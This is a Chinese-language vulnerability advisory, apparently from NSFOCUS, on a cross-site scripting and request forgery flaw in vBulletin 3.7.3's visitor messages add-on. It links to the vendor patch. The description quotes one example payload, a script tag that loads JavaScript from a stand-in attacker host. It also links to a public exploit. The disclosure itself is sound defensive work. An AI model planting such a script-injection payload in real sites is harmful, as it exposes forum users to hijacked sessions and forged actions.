首页 -> 安全研究

安全研究

安全漏洞
vBulletin Visitor Messages附加组件跨站脚本及跨站请求伪造漏洞

发布日期:2008-11-20
更新日期:2008-11-21

受影响系统:
VBulletin VBulletin 3.7.3
不受影响系统:
VBulletin VBulletin 3.7.4 PL1
描述:
BUGTRAQ  ID: 32387

vBulletin是一款开放源代码的PHP论坛程序。

vBulletin论坛所使用的visitor messages附加组件中存在输入验证错误。在张贴包含有跨站脚本的内容时,数据在显示给论坛公众之前要通过htmlentities();运行。但在张贴新消息的时候,会向被评论者发送新的通知。评论者可以张贴包含有跨站脚本内容的帖子,如<script src="http://evilsite.com/nbd.js"> ,然后当被评论者访问域中的usercp.php时,就会得到未经过滤的跨站脚本附件。此外通过类似的方式,攻击者还可以执行跨站请求伪造攻击。

<*来源:Mx
  
  链接:http://secunia.com/advisories/32782/
        http://www.vbulletin.com/forum/showthread.php?t=291665
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

http://www.milw0rm.com/exploits/7174

建议:
厂商补丁:

VBulletin
---------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:

http://members.vbulletin.com/patches.php

浏览次数:3070
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障